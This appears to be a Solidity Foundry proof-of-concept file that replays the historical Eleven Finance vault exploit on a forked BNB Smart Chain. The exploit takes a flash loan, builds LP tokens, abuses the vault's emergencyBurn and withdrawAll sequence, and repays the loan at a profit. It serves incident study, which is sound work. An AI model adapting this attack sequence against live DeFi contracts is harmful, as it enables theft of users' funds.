-
Notifications
You must be signed in to change notification settings - Fork 1.2k
/
Copy pathEleven_exp.sol
129 lines (92 loc) · 4.01 KB
/
Eleven_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
// SPDX-License-Identifier: UNLICENSED
//Credit: Cache_And_Burn
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
/*
Eleven Finance Exploit POC
tx hash: 0x6450d8f4db09972853e948bee44f2cb54b9df786dace774106cd28820e906789
https://peckshield.medium.com/eleven-finance-incident-root-cause-analysis-123b5675fa76*/
contract Eleven is Test {
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
IPancakeRouter router = IPancakeRouter(payable(0x10ED43C718714eb63d5aA57B78B54704E256024E));
IPancakePair cake_LP = IPancakePair(0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd);
IERC20 nrv = IERC20(0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096);
IERC20 busd = IERC20(0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56);
IWBNB wbnb = IWBNB(payable(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c));
address public ape_lp = 0x51e6D27FA57373d8d4C256231241053a70Cb1d93;
IElevenNeverSellVault vault = IElevenNeverSellVault(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8);
//Path from BUSD --> NRV
address[] path_1 = [0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56, 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096];
//Path from NRV --> BUSD
address[] path_2 = [0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096, 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56];
function setUp() public {
// fork bsc block number 8530973
cheats.createSelectFork("bsc", 8_530_973);
busd.approve(address(router), type(uint256).max);
busd.approve(ape_lp, type(uint256).max);
nrv.approve(address(router), type(uint256).max);
cake_LP.approve(address(vault), type(uint256).max);
cake_LP.approve(address(router), type(uint256).max);
}
function testExploit() public {
console.log("-------Start exploit-------");
console.log("attacker BUSD balance before is", busd.balanceOf(address(this)));
cheats.startPrank(0xc71e2F581b77De945C8A7A191b0B238c81f11eD6);
//Take a flashloan from apeswap
IPancakePair(ape_lp).swap(0, 953_869_628_210_538_003_222_368, address(this), "Gimme da loot");
}
function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
attack();
}
function attack() public {
console.log("received BUSD flashloan for", busd.balanceOf(address(this)) / 1 ether);
//Swap BUSD for NRV
router.swapExactTokensForTokens(
340_631_231_201_021_740_166_440,
474_378_756_062_092_796_179_091,
path_1,
address(this),
block.timestamp + 500 seconds
);
//Add liquidity to pancakeSwap and receive LP tokens
router.addLiquidity(
address(nrv),
address(busd),
474_378_756_062_092_796_179_091,
366_962_025_372_860_720_681_305,
474_378_756_062_092_796_179_091,
366_962_025_372_860_720_681_305,
address(this),
block.timestamp + 500 seconds
);
//Deposit LP tokens into Eleven vault
vault.depositAll();
//Call emergency Burn
vault.emergencyBurn();
//withdraw from vault
vault.withdrawAll();
//remove liquidity from pancakeSwap
router.removeLiquidity(
address(nrv),
address(busd),
823_030_594_158_097_624_422_918,
449_328_228_768_287_545_012_441,
347_583_855_261_065_794_904_977,
address(this),
block.timestamp + 500 seconds
);
//swap NRV for BUSD
router.swapExactTokensForTokens(
948_757_512_124_185_592_358_179,
624_113_299_151_540_843_640_146,
path_2,
address(this),
block.timestamp + 500 seconds
);
//repay flashloan
busd.transfer(ape_lp, 956_739_847_753_799_401_426_648);
console.log("-------Finish exploit-------");
console.log("attacker BUSD balance after is", busd.balanceOf(address(this)) / 1 ether);
}
}